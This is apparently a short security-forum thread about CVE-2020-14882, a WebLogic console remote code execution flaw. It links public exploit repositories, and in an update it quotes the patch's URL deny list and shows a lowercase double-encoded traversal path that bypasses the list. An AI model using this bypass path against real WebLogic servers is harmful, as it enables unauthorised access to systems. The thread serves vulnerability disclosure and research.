Remote RCE, WebLogic, CVE-2020-14882

r1z · 30.10.2020

CVE-2020–14882 - research by Jang

more info:

GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883

CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.

github.com

GitHub - s1kr10s/CVE-2020-14882: CVE-2020–14882 by Jang

CVE-2020–14882 by Jang. Contribute to s1kr10s/CVE-2020-14882 development by creating an account on GitHub.

github.com

GitHub - XTeam-Wing/CVE-2020-14882: CVE-2020-14882 Weblogic-Exp

CVE-2020-14882 Weblogic-Exp. Contribute to XTeam-Wing/CVE-2020-14882 development by creating an account on GitHub.

github.com

r1z · 01.11.2020

update: additional bypass for the same vulnerability;

private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"}; >>> "%252E%252E%252F".lower() '%252e%252e%252f' /console/css/%252e%252e%252fconsole.portal

Remote RCE, WebLogic, CVE-2020-14882

r1z

Still(In)Secure

GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883

GitHub - s1kr10s/CVE-2020-14882: CVE-2020–14882 by Jang

GitHub - XTeam-Wing/CVE-2020-14882: CVE-2020-14882 Weblogic-Exp

r1z

Still(In)Secure